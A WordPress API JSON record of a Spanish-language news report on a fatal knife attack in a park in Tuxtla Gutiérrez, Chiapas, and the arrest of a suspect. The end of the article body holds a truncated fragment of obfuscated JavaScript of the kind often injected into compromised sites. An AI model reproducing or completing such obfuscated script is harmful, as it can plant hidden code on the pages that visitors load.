{"id":15348,"date":"2024-04-29T02:47:58","date_gmt":"2024-04-29T02:47:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15348"},"modified":"2024-04-29T02:47:59","modified_gmt":"2024-04-29T02:47:59","slug":"muer3-navajeado-la-coa-en-el-parque-de-la-colonia-madero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15348","title":{"rendered":"Muer3 navajeado &#8220;La Coa&#8221; en el Parque de la Colonia Madero"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15349\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358747692-1024x576.jpg\" alt=\"\" class=\"wp-image-15349\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358747692-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358747692-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358747692-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358747692.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15350\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358750671-1024x576.jpg\" alt=\"\" class=\"wp-image-15350\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358750671-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358750671-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358750671-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358750671.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15351\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358744702-1024x576.jpg\" alt=\"\" class=\"wp-image-15351\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358744702-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358744702-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358744702-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1714358744702.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 28 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un sujeto fue asesin@do a navajazos este domingo por la tarde en las inmediaciones del Parque de la Colonia Francisco I Madero de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, todo ocurri\u00f3 cuando el sujeto identificado como &#8220;La Coa&#8221;, sostuvo una ri\u00f1a con un amigo de copas.<\/p>\n\n\n\n<p>Hasta el momento se desconoce el motivo del conflicto, sin embargo, su atacante sac\u00f3 una navaja y lo ataco en varias ocasiones para escapar con rumbo desconocido.<\/p>\n\n\n\n<p>Testigos relataron que la v\u00edctima era un enfermo alcoh\u00f3lico que se reun\u00eda en ese punto ubicado en la 4a Sur y 1a Poniente a consumir bebidas embriagantes.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja Mexicana en conjunto de elementos de la Comisi\u00f3n Nacional de Emergencias, quienes tras una valoraci\u00f3n determinaron que ya hab\u00eda muerto.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\n\n\n<p>Elementos de la polic\u00eda montaron un operativo de b\u00fasqueda y lograron detener al presunto responsable.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 28 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un sujeto fue asesin@do a navajazos este domingo por la tarde en las inmediaciones del Parque de la Colonia Francisco I Madero de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, todo ocurri\u00f3 cuando el sujeto identificado como &#8220;La Coa&#8221;, sostuvo una ri\u00f1a con &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15351,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15348","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15348"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15348\/revisions"}],"predecessor-version":[{"id":15352,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15348\/revisions\/15352"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15351"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}